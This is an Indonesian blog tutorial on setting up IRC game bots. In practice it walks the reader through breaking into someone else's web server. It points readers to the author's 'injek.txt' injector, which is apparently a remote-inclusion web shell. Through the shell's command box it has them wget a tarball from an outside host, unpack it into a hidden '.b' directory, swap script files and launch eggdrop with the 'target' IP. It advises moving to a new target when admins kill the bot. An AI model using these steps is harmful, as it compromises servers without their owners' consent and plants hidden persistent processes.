Cara Buat Bot Game di allnet




Bot game ?? apa itu bot game ?? Bot game adalah ....emm... ya bot yang bisa nge-game...hehehehe gitu aja kowq repotttt...
game nya apaan .. itu tergantung source / tcl yang di jalankan ...

Sebenernya ada kesamaan antara ngebuat bot eggdrop dengan buat bot game. cuman tinggal masukin beberapa tcl aja di dir scripts . Sebenernya sih agak ribet juga....

Sekarang mari kita mulaiii !!! ( game ini udah ada pada server allnet )

1. silahkan buka target kamu (me make injek http://h1.ripway.com/stevf57/injek.txt?? ga perlu diajarin lg yaaaaa... )

2. Saya anggep kamu sudah mencari permission yang tidak denied nya... masukin kedalam change directory...

3. wget http://h1.ripway.com/stevf57/game.tar.gz masukin / ketik kedalam command execute kemudian klik excute

4. tar -zxvf gametar.gz masukin / ketik kedalam command excute kemudian klik execute

5. rm -fr game.tar.gz masukin / ketik kedalam command excute kemudian klik execute

6. nah disini letak yang agak "ribet" nya itu... hehehehee.... sekarang perhatian kamu alihkan ke dalam kolom change directory. Trus kamu tambahkan disana /.b/scripts

Contoh : kolom change dir kamu adalah

/home/muveszet/public_html/spaw/imagesszobor

setelah ditambah menjadi :

/home/muveszet/public_html/spaw/imagesszobor/.b/scripts

Ngerti ga niehhh...

7. Trus kamu ketikkan ls -alF di kolom command execute kemudian klik execute....Taraaaa...kamu bisa liat disana semua isi dari directory scripts.... keliatann ??
nah disana ada beberapa tcl yang harus kita edit... ga usah banyak2 dulu ya, standart nya sih cukup lima file aja yang harus diedit, supaya game kamu bisa jalan di chanel yang kamu mau. ini dia yg mesti kamu edit : kaos.tcl - kaos.cfg.txt - quiz.rc - quiz.tcl - trivia.tcl

gmana cara ngedit nya ??

hmm... pastikan kolom change dir kamu ga berubah, tadikan..

/home/muveszet/public_html/spaw/imagesszobor/.b/scripts

nah jangan kamu rubah2 doloo ( hehehehe..agak emosi nihh...maklum lg laperr beratt...

lanjuttt yaa... sekarang ketik cat kaos.cfg.txt di kolom command execute kamu kemudian klik execute....tunggu bentar , akan keluar spt ini...

# KAOS Config File
Points=points
Channel=#cerme
AutoStart=1
AskedFile=kaos.asked
KAOSFile=scripts/kaos.db
Ad1=Go to http://fadlie.tv and Enjoy Here
Ad2=Add my Friendster at vj_stevf@mboiz.co.uk
Ad3=KAOS 0.91 Modify wisnoee

gmana ? ketemu ..... kalo udah, sekarang kamu kopi - paste kedalam notepad. Trus kamu edit nama chanel nya aja .. contoh : #adjee kamu ganti jadi chanel kamu. Trus kamu save dengan nama file kaos.cfg.txt juga...


cat kaos.tcl
trus paste lg hasilnya kedalam n
Trus kamu edit nama chanel nya aja .. contoh : #chanelkmu kamu ganti jadi chanel kamu. Kemudian kamu save dgn nama file kaos.tcl ngerti ga nieehhh ?? lanjut ya.. ?

Demikian juga untuk 3 yg tersisa..caranya lakukan sama spt yg diatas..sampe kelimanya lengkap kamu save... gmana? dah selesaii ? hmm.. berarti sekarang kamu udah punya kelimanya yaa...

Nb :
1. jika kamu masih ga bisa ngambil kelima file nya tadi...silahkan tinggalkan messege , atau bisa juga liwat YM saya. nanti saya akan kirimkan file nya buat kamu

Kurang baek apa lagi cobaaa !! hehehehe


2. jangan sampai nama chanel nya ada yg tertinggal di edit... kalo ada berarti kemungkinan game nya ga akan jalan di chanel yg kamu inginkan.

Saya anggep kamu sudah punya kelimanya...sekarang ikuti langkah selanjutnya...


8. change directory kamu masih tetep pada
/home/muveszet/public_html/spaw/imagesszobor/.b/scripts

trus kamu ketikkan rm -fr kaos.tcl kaos.cfg.txt quiz.rc quiz.tcl trivia.tcl dikolom command execute , kemudian klik execute.. command rm -fr ini dijalankan untuk menghapus file yang default tadi.

9. Nah kamu sudah menghapus file yg default nya. Sekarang kamu harus meng-upload file2 tadi yang kamu save di notepad. kaos.tcl kaos.cfg.txt quiz.rc quiz.tcl trivia.tcl kamu upload satu persatu kelima file itu. Tau cara upload nya ?? hmm... kan di bawah ada kolom upload file, tinggal browse aja dmana letak file tsb kamu simpan. kemudian klik upload file, tunggu bentar..kalo berhasil akan muncul spt ini File uploaded berHasiL cOy! ( itu kalo make make injector saya http://h1/ripway.com/stevf57/injek.txt??? )

Selanjut nya tetep ikutin cara diatas sampai kelima2 file kamu ter-upload semua.

Setelah selesai upload, sekarang kita memasuki tahap konfigurasi...

10. a. Hapus directory /scripts di change directory kamu.. Contoh : sebelumnya adalah

/home/muveszet/public_html/spaw/imagesszobor/.b/scripts maka setelah dihapus
menjadi :

/home/muveszet/public_html/spaw/imagesszobor/.b

10. b. Ketik ./b y.txt (namabot) (identd) (nomerIP) (channel) (owner) di kolom command execute kemudian klik execute .

namabot = nama bot kamu
ident = user ID bot kamu
nomerIP = nomer IP target kamu
chanel = chanel dimana bot game dit4kan
owner = nickname kamu

Dah jelasss !!!

11. Nah2 ini langkah terakhirrrr.... tapi sebelum nya dolo ah biara ga ngantuk

Bersambung aja yahhh ... gmana ?? hehehehhee

12. Beneran deh kali ini langkah yg terakhirr

ketik ./dssl y.txt ato bisa juga ./eggdrop -m y.txt di command execute kemudian klik execute.

SELESAAAAIII !!! silahkan tunggu bot game nya join ke chanel kamu. sambil nunggu ga ada salah nya kamu whois botgame kamu, biasanya sih dah masuk ke server cuman blon join ke chanel. Pv bot kamu trus ketik pass passwordkamu , Contoh : pass wisnoeejelek kemudian ketik lagi login passwordkamu , Contoh : login wisnoeejelek

Selamat !! bot kini telah resmi menjadi milik kamu

Nb : Jika ada pertanyaan, keluhan, kritikan silahkan tinggalkan pesan....

- Jika tidak join2 di irc.dal.net, berarti :

kena akill ( berarttiii careeeee targetttt laggeeeee )

proses bot dimatikan admin ( berarttiii careeeee targetttt laggeeeee )

- Jangan load bot banyak-banyak dalam satu server karna akan mempercepat kematian bot hehehehe

Nah ... Yang diatas kan bot game nya hanya untuk server dalnet tuh... Trus gmana kalo bot nya buat server yang lain ... Allnetwork contohnya....

hmm... Pada prisnipnya sih cara buat / langkah2 nya sama seperti diatas,, cuma kita perlu meng-edit beberapa bagian penting didalem tcl tsb, agar bot nantinya bisa join di server yg kita kehendaki. So kamu tinggal cari aja dmana letaknya yang perlu di edit.....

Dah ketemu dunk...bagian mana aja yg mesti diedit....


Kalaupun belon, tenang ... saya sudah mengeditkannya buat kamu....

Nehh kamu bisa ambil disini http://h1.ripway.com/stevf57/game.tar.gz


Selamat mencobaa yaa.................!!!

owh iya.. untuk source links scriptnya di download dlu ke pc. ntar linknya mate lagi. buruan..
kalau linknya dah suspend alias dah mati / kadaluarsa. coba ke email sini ajaa.

OK .. Sekian dan Terima Kasih..


Author » Unknown
Post Title » Cara Buat Bot Game di allnet
Post Url » http://www.zulmaseke.web.id/2010/12/cara-buat-bot-game-di-allnet-bot-game.html
Time » Kamis, Desember 02, 2010
Responds » 0
Labels » ,

Artikel Terkait:

Posting Komentar
 

About Me

foto saya
Im Zulkiliyanto M. From Gorontalo North Sulawesi, I am a simple interested in new and useful things, hopefully get a new experience to innovate to create more advanced. Sharing is fun.[...]

Pengikut

Visitor


free counters